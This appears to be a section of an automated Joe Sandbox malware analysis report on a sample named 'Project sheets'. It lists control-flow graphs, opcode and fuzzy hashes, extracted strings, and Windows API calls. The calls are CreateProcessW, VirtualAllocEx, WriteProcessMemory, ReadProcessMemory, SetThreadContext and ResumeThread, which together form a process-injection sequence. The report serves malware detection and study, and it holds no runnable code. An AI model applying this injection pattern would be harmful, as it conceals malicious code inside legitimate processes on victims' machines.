                    control_flow_graph 375 17f9929-17f992a 376 17f999e-17f9c4a 375->376 377 17f992c-17f9932 375->377 382 17f9c4c 376->382 383 17f9c51-17f9c6c 376->383 377->376 382->383 384 17f9dea-17f9df0 383->384 385 17f9c72 383->385 386 17f9c79-17f9c95 385->386 387 17f9c9e-17f9c9f 386->387 388 17f9c97 386->388 387->384 389 17f9ca4-17f9cab 387->389 388->384 388->385 388->389 390 17f9d8d-17f9dac 388->390 391 17f9d4c-17f9d54 388->391 392 17f9cb7-17f9d0f 388->392 393 17f9d14-17f9d19 388->393 394 17f9db1-17f9dbc call 17f7a10 388->394 389->389 395 17f9cad-17f9cb5 389->395 390->386 399 17f9d56-17f9d59 391->399 392->386 397 17f9d2c-17f9d33 393->397 398 17f9d1b-17f9d2a 393->398 403 17f9dc1-17f9de5 394->403 395->386 402 17f9d3a-17f9d47 397->402 398->402 404 17f9d64-17f9d88 399->404 402->386 403->386 404->386
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID: R(q(
                    • API String ID: 0-1972367136
                    • Opcode ID: 3b8f5d63abc2e9a0db027f4e4c592c2ca7bcd11143c0a439d24828b59f7ac657
                    • Instruction ID: 33a32cb9a6d2ee163dee8a4efc3286f449649e78ae21ca139aa5302f72c14fd3
                    • Opcode Fuzzy Hash: 3b8f5d63abc2e9a0db027f4e4c592c2ca7bcd11143c0a439d24828b59f7ac657
                    • Instruction Fuzzy Hash: 9E614770D0A2499FCB09CFB9D9806DEFBF2AF8A304F1484AAD601A7395D7349945CF51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID: u
                    • API String ID: 0-2947761970
                    • Opcode ID: e3bf4d09fe22f7b940b93690ec23ad481e1b631d0b9ac4238c6f60bb2a6ebd27
                    • Instruction ID: 1daa1f8ea7d4b97ad18a144ba78abf482784c4cae4f4440aabfa84f657696958
                    • Opcode Fuzzy Hash: e3bf4d09fe22f7b940b93690ec23ad481e1b631d0b9ac4238c6f60bb2a6ebd27
                    • Instruction Fuzzy Hash: FCD17275E1524ACFCB14CFA9C8409AEFBB2FF99310F64826ED615AB351D731A902CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID: u
                    • API String ID: 0-2947761970
                    • Opcode ID: 9c5ebb353fcd4c9391e8f38096bf18ce5cbf4b77999b0a1fac5cb04277015bfd
                    • Instruction ID: 181dc136542d1cda8bcd4a4cd1da80f6489fe4922880de91ec5de0399c4445ae
                    • Opcode Fuzzy Hash: 9c5ebb353fcd4c9391e8f38096bf18ce5cbf4b77999b0a1fac5cb04277015bfd
                    • Instruction Fuzzy Hash: 4AB10FB4E15219CFCB18CFA9C9809AEFBF2BF89310F20816AD515BB355D7359902CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID: u
                    • API String ID: 0-2947761970
                    • Opcode ID: fd123a109444a3bfe4a534b52f771d9d0e77cd9fd5059504fb29385836f0c640
                    • Instruction ID: bf19c89e47cb49e8ee49c84ebaf147326dcbbcd3bc615b212f8afed58da9f714
                    • Opcode Fuzzy Hash: fd123a109444a3bfe4a534b52f771d9d0e77cd9fd5059504fb29385836f0c640
                    • Instruction Fuzzy Hash: 5AB1EFB4E11219CFDB18CFAAC9809AEFBF2BF89310F20812AD515BB354D7359902CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID: n_K
                    • API String ID: 0-3499950289
                    • Opcode ID: d86015bb612abcaee8db6610134896ca7a87bb2a1cb0dc7d86e4076b69adc515
                    • Instruction ID: 440ebfddcaa8d2eb10171e728c449089833f0433eaa19095537fe97aa329d457
                    • Opcode Fuzzy Hash: d86015bb612abcaee8db6610134896ca7a87bb2a1cb0dc7d86e4076b69adc515
                    • Instruction Fuzzy Hash: 46B10578E042089FCB28DFB5D944A9EBBB2FF99310F10D06AD90AA7354DB355946CF10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID: n_K
                    • API String ID: 0-3499950289
                    • Opcode ID: 050493c32c4f7e194c4d4040e1861aea5ea9ac239a96dbeaab13221fcd17db16
                    • Instruction ID: 93a224921f8fcf3746f938c9fde0a814442b0bf8ec61f2901a7486442f0e991d
                    • Opcode Fuzzy Hash: 050493c32c4f7e194c4d4040e1861aea5ea9ac239a96dbeaab13221fcd17db16
                    • Instruction Fuzzy Hash: 3FB10378E042089FCB28DFB5D944AAEBBB2FF99310F10D46AD90AA7354DB345946CF10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 09d79aedc70806e4303d14a51cf1ea0647a9255ec304099c03a8de61e4d47cc4
                    • Instruction ID: 112d7722f94d1e907776dfcce8d668662fe10a656c62524088a296a64149f338
                    • Opcode Fuzzy Hash: 09d79aedc70806e4303d14a51cf1ea0647a9255ec304099c03a8de61e4d47cc4
                    • Instruction Fuzzy Hash: C351E172D0460A9FCB14DFA9D84199EFBB2FF99310F14C16AE511AB395E734A901CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5a8d2d7ee7e8014dc4a3bf5e30b72be05ec1e59ccdc574a1ba69a0048de2a377
                    • Instruction ID: d8553fe42aff04e6ad6b51ddafa318ace27083b3f32e715c4a5912fb6df7039d
                    • Opcode Fuzzy Hash: 5a8d2d7ee7e8014dc4a3bf5e30b72be05ec1e59ccdc574a1ba69a0048de2a377
                    • Instruction Fuzzy Hash: 4351E674E042099FDB08CFAAC9406AEFBF2BF88310F24C16AD615A7355D7349A418FA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a136610eaf8bb5e0d243952b856c6ea2991373e0e54258f7f8c19c4da6760332
                    • Instruction ID: 471fbfc1bdaa57050e1708130e77ef77da543e25e87fffdfba64f66fab713f64
                    • Opcode Fuzzy Hash: a136610eaf8bb5e0d243952b856c6ea2991373e0e54258f7f8c19c4da6760332
                    • Instruction Fuzzy Hash: C621E8B1E046188BEB28CFAAD8443DEFBF2BFC8310F14C16AD509A6254DB750A46CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3a7766e07ee348055d03fc6b37533eb09c181a7abfab7fd1f389406ad456f758
                    • Instruction ID: 90a97b201a0303984bbf3a748ebd96848e816f3ba5649bb30fe2624413ede17a
                    • Opcode Fuzzy Hash: 3a7766e07ee348055d03fc6b37533eb09c181a7abfab7fd1f389406ad456f758
                    • Instruction Fuzzy Hash: A8110D71E016199BEB28CFABDC4469EFBF3BFC8300F04C07AD908A6218EB3005428E10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 323 17fc1b4-17fc24b 324 17fc24d-17fc25f 323->324 325 17fc262-17fc270 323->325 324->325 326 17fc287-17fc2c3 325->326 327 17fc272-17fc284 325->327 328 17fc2d7-17fc3b2 CreateProcessW 326->328 329 17fc2c5-17fc2d4 326->329 327->326 333 17fc3bb-17fc484 328->333 334 17fc3b4-17fc3ba 328->334 329->328 343 17fc4ba-17fc4c5 333->343 344 17fc486-17fc4af 333->344 334->333 348 17fc4c6 343->348 344->343 348->348
                    APIs
                    • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 017FC39F
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 79dfd48693eed8ab741408c3f775a4510cee93279cb2a7ec3c7b198d263a91d3
                    • Instruction ID: 627fbd4ffccb235684019ea614f6ead45454ab50fdc3d19f5894f0843cfb1ebb
                    • Opcode Fuzzy Hash: 79dfd48693eed8ab741408c3f775a4510cee93279cb2a7ec3c7b198d263a91d3
                    • Instruction Fuzzy Hash: 8A81D275D0026D9FCB25CFA9C980BDEBBF1AF19304F0090AAE548B7260D7749A89CF54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 349 17fc1c0-17fc24b 350 17fc24d-17fc25f 349->350 351 17fc262-17fc270 349->351 350->351 352 17fc287-17fc2c3 351->352 353 17fc272-17fc284 351->353 354 17fc2d7-17fc3b2 CreateProcessW 352->354 355 17fc2c5-17fc2d4 352->355 353->352 359 17fc3bb-17fc484 354->359 360 17fc3b4-17fc3ba 354->360 355->354 369 17fc4ba-17fc4c5 359->369 370 17fc486-17fc4af 359->370 360->359 374 17fc4c6 369->374 370->369 374->374
                    APIs
                    • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 017FC39F
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 8ca844da5999bdc592a753d3fcd33c66372bff90abd300a270587c4cfcab27ac
                    • Instruction ID: dadafbf9829cd8d911045f4aac6bca791b75552775cce6d72fb684cd26b0be53
                    • Opcode Fuzzy Hash: 8ca844da5999bdc592a753d3fcd33c66372bff90abd300a270587c4cfcab27ac
                    • Instruction Fuzzy Hash: 7681E375D0026D9FCB25CFA9C980BDEFBF1AB09304F0090AAE548B7260D7749A89CF54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 417 17fc8f8-17fc95f 418 17fc976-17fc9d6 WriteProcessMemory 417->418 419 17fc961-17fc973 417->419 420 17fc9df-17fca1d 418->420 421 17fc9d8-17fc9de 418->421 419->418 421->420
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 017FC9C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 81ab93e4428dac2688188579e02141176e1c09b2cf21f90519c69a815959196e
                    • Instruction ID: 72a0a6d993ecef7180e7dfb25b5f861b5744bae30bc5e697ebd1b69ae51c6267
                    • Opcode Fuzzy Hash: 81ab93e4428dac2688188579e02141176e1c09b2cf21f90519c69a815959196e
                    • Instruction Fuzzy Hash: CF4165B5D012589FCB10CFA9D984ADEFBF1BB49314F24902AE918B7310D375AA45CB64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 410 17fc8f4-17fc95f 411 17fc976-17fc9d6 WriteProcessMemory 410->411 412 17fc961-17fc973 410->412 413 17fc9df-17fca1d 411->413 414 17fc9d8-17fc9de 411->414 412->411 414->413
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 017FC9C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 8e21b8f8e89bdb61dc5a0a763f3d4496bd5dcdd27c79aba08320a676d69831fa
                    • Instruction ID: d8f4e7b742946656bfe30e9bb3546f1ce72f4e774089e00a88f738d9cf6ac4a8
                    • Opcode Fuzzy Hash: 8e21b8f8e89bdb61dc5a0a763f3d4496bd5dcdd27c79aba08320a676d69831fa
                    • Instruction Fuzzy Hash: 534175B5D012589FCB10CFA9D984AEEFBF1BB49314F24902AE918B7310D335AA45CB64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 424 17fc70f-17fc71d 425 17fc71f-17fc733 424->425 426 17fc791-17fc81d VirtualAllocEx 424->426 429 17fc73a-17fc752 425->429 430 17fc735 425->430 427 17fc81f-17fc825 426->427 428 17fc826-17fc85c 426->428 427->428 430->429
                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 017FC80D
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 8ce6f8d7400040b05a6831d20f39b23062a6d00ddf07df2c1ca260e7ed7a0a12
                    • Instruction ID: caf2eadfba8fd9a6d42f3c8b5ae2eab9d228ed09221b33f5743e1a584aab0a57
                    • Opcode Fuzzy Hash: 8ce6f8d7400040b05a6831d20f39b23062a6d00ddf07df2c1ca260e7ed7a0a12
                    • Instruction Fuzzy Hash: 3E31CE75D052489FCF11CFA8E480ADEFBB0BB5A314F10A06AE914B7310D3359945DF55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 435 17fc600-17fc6c5 ReadProcessMemory 436 17fc6ce-17fc70c 435->436 437 17fc6c7-17fc6cd 435->437 437->436
                    APIs
                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 017FC6B5
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID: MemoryProcessRead
                    • String ID:
                    • API String ID: 1726664587-0
                    • Opcode ID: f7a57c1fb40c7c8987b4699580720a56cb0417a8538feff4ec0757bc17331fd4
                    • Instruction ID: 84b5781a81cae16befc921d5ba4a9c810783d3ec1ff5bdb253ca647da9bb2740
                    • Opcode Fuzzy Hash: f7a57c1fb40c7c8987b4699580720a56cb0417a8538feff4ec0757bc17331fd4
                    • Instruction Fuzzy Hash: BB4177B9D042589FCF10CFA9D984ADEFBB1BB19314F10A06AE824B7310D335A946DF64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 440 17fc608-17fc6c5 ReadProcessMemory 441 17fc6ce-17fc70c 440->441 442 17fc6c7-17fc6cd 440->442 442->441
                    APIs
                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 017FC6B5
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID: MemoryProcessRead
                    • String ID:
                    • API String ID: 1726664587-0
                    • Opcode ID: 99e5fa9a37a8de1b4e1e7ca13ce8b338e355306a7082f0f171bbf9a1e0a7015f
                    • Instruction ID: 3b8b90d92083bea5115dbef8a4b7e01fdacf62c3f2b7ba3a8e88c96457f0c8d1
                    • Opcode Fuzzy Hash: 99e5fa9a37a8de1b4e1e7ca13ce8b338e355306a7082f0f171bbf9a1e0a7015f
                    • Instruction Fuzzy Hash: 583187B9D042589FCF10CFAAD984ADEFBB5BB19310F10A02AE924B7310D335A945CF64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 445 17fc761-17fc81d VirtualAllocEx 446 17fc81f-17fc825 445->446 447 17fc826-17fc85c 445->447 446->447
                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 017FC80D
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: d59e4a2f974f6b8ecaf371394d37faa12cf2a9f03843c151a08d4b0620c74eae
                    • Instruction ID: 596ebe575b9a8676ed1c6fbf5ac08dec8efbf134bddaf312381b604b3449bfee
                    • Opcode Fuzzy Hash: d59e4a2f974f6b8ecaf371394d37faa12cf2a9f03843c151a08d4b0620c74eae
                    • Instruction Fuzzy Hash: 9F3167B9D042589FCF10CFA9D984ADEFBB5BB59310F10902AE814B7310D335A946CF64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 450 17fc768-17fc81d VirtualAllocEx 451 17fc81f-17fc825 450->451 452 17fc826-17fc85c 450->452 451->452
                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 017FC80D
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 2d9c806efc002b95fe817203e37ff864d8f876f5d741b316780556756bfbeb68
                    • Instruction ID: db1c4b7f27498c1faf04356fb377086fb01337cf867eb19c2c0c5677857e79bb
                    • Opcode Fuzzy Hash: 2d9c806efc002b95fe817203e37ff864d8f876f5d741b316780556756bfbeb68
                    • Instruction Fuzzy Hash: 073155B9D042589FCF10CFA9D984ADEFBB5BB19320F10A02AE914B7310D335A945CF65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetThreadContext.KERNELBASE(?,?), ref: 017FC5A2
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID: ContextThread
                    • String ID:
                    • API String ID: 1591575202-0
                    • Opcode ID: 83db02b45e313563d6535a362bcd07e3e16b18f3a5da808a10d0de0338788cf3
                    • Instruction ID: e6a81b003e13404df06de91e20c506cdbc5bb4dba01171311a6237aefc83fa64
                    • Opcode Fuzzy Hash: 83db02b45e313563d6535a362bcd07e3e16b18f3a5da808a10d0de0338788cf3
                    • Instruction Fuzzy Hash: C031A8B5D012589FCB10CFA9D984AEEFBF1BB49314F24806AE414B7310C379AA45CF64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetThreadContext.KERNELBASE(?,?), ref: 017FC5A2
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID: ContextThread
                    • String ID:
                    • API String ID: 1591575202-0
                    • Opcode ID: 7781a164da932cdefa2af367d476eeac8f4c5bdae23203c5ad54e96ca4855e16
                    • Instruction ID: 4af8681b58cf1ffaea8008e95fa59038e017b52f30ad0a7c118f92997c67a36e
                    • Opcode Fuzzy Hash: 7781a164da932cdefa2af367d476eeac8f4c5bdae23203c5ad54e96ca4855e16
                    • Instruction Fuzzy Hash: 813198B5D012589FCB10CFAAD984ADEFBF1BB49314F24902AE518B7310D378AA45CF64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ResumeThread.KERNELBASE(?), ref: 017FCAAE
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 433982921522beabb68b573e052130e4f68ad3e9a1d3a9b9489be362c0100498
                    • Instruction ID: e40c0cc83c9e9bfaa6094986d4298480c3b52f998963a699daee45def9f4ed49
                    • Opcode Fuzzy Hash: 433982921522beabb68b573e052130e4f68ad3e9a1d3a9b9489be362c0100498
                    • Instruction Fuzzy Hash: 502197B9D002189FCB10CFA9D584ADEFBF4BB49324F24906AE919B7310D335A945CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ResumeThread.KERNELBASE(?), ref: 017FCAAE
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: d7b3d90b8da2a3fffa3469c39eaf990579b7344c40ab733a70568bc005ed28f3
                    • Instruction ID: 44077f8d43d0e773206d8c986187cf2c3f0c4fc19f49c8f928cceceaf87e91f5
                    • Opcode Fuzzy Hash: d7b3d90b8da2a3fffa3469c39eaf990579b7344c40ab733a70568bc005ed28f3
                    • Instruction Fuzzy Hash: 2121B7B9D002189FCB10CFA9D484ADEFBF4BB09324F24902AE918B7310D335A945CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID: YAy$k%#
                    • API String ID: 0-3673131554
                    • Opcode ID: 8821a7aafd4747d8d109ee715ca5cf96f66409344efb4a8d20c720c010abd66a
                    • Instruction ID: c8d11047fd17ae37e5d6904f1d475d001e13f65b4fe196ae37e383800a4f0990
                    • Opcode Fuzzy Hash: 8821a7aafd4747d8d109ee715ca5cf96f66409344efb4a8d20c720c010abd66a
                    • Instruction Fuzzy Hash: 7071F374E052099FCB08CFA9D58499EFBF2FF88310F14855AE519AB324D734AA41CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID: YAy$k%#
                    • API String ID: 0-3673131554
                    • Opcode ID: 80f889adef5c423a20b7786b9f806c4404439ca149dcc4b88769222825756d42
                    • Instruction ID: e72bac63480dc7b111ed8389ed897b04cc60e1900cc9130e05ecf0a0c5ee1de9
                    • Opcode Fuzzy Hash: 80f889adef5c423a20b7786b9f806c4404439ca149dcc4b88769222825756d42
                    • Instruction Fuzzy Hash: E971E134E152099FCB48CFA9D58499EFBF2FF88310F14856AE519AB325D734AA41CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID: G0$G0
                    • API String ID: 0-2055179447
                    • Opcode ID: 13a2c242891d8885b26b51796b44f3b299a0964935d24f8fcde798c9a0098fe7
                    • Instruction ID: c9522a6ecdae8c83f9f90d0cb5d7b1ed22d6e576da714dc12334f9707acb8709
                    • Opcode Fuzzy Hash: 13a2c242891d8885b26b51796b44f3b299a0964935d24f8fcde798c9a0098fe7
                    • Instruction Fuzzy Hash: E161F5B1E0420ADBCB04CFA9D5819AEFBB1FB89300F14946AD615AB344D7349A418F95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID: ft%
                    • API String ID: 0-1733484113
                    • Opcode ID: 9aba99d9d46027b292bcf7f7b5239086ecd7a14bcca0fbc1262b3c94508b51f2
                    • Instruction ID: cd8701d68639f42a153ed2c9fac71e436b620dade7f735161d9e8dc3f5979cfe
                    • Opcode Fuzzy Hash: 9aba99d9d46027b292bcf7f7b5239086ecd7a14bcca0fbc1262b3c94508b51f2
                    • Instruction Fuzzy Hash: 8241D6B4E0820A9FCB04CFAAC9815AEFBF2EF88310F24D169D615A7254D73596418F94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID: ft%
                    • API String ID: 0-1733484113
                    • Opcode ID: e49775ccd028e16349191e1281fd33581ee4e0c0afb781e901fd40eddc7afe24
                    • Instruction ID: 54c52f4d5c3636f3fa0e5a54041b8bfa535dcb928d21d614ef1ed15248ffc203
                    • Opcode Fuzzy Hash: e49775ccd028e16349191e1281fd33581ee4e0c0afb781e901fd40eddc7afe24
                    • Instruction Fuzzy Hash: A441F4B4E1820A9FCB08CFAAC8805AEFBF2FF88310F24C56AD615A7254D73596418F54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fb40d04a3b7abc64eba7269005aee192bb666ef5af38aff0b8093317ca48a42d
                    • Instruction ID: 647b3683075d6242568fbc895514aa929b55fbe55d1051a62fecea47a9fae7a4
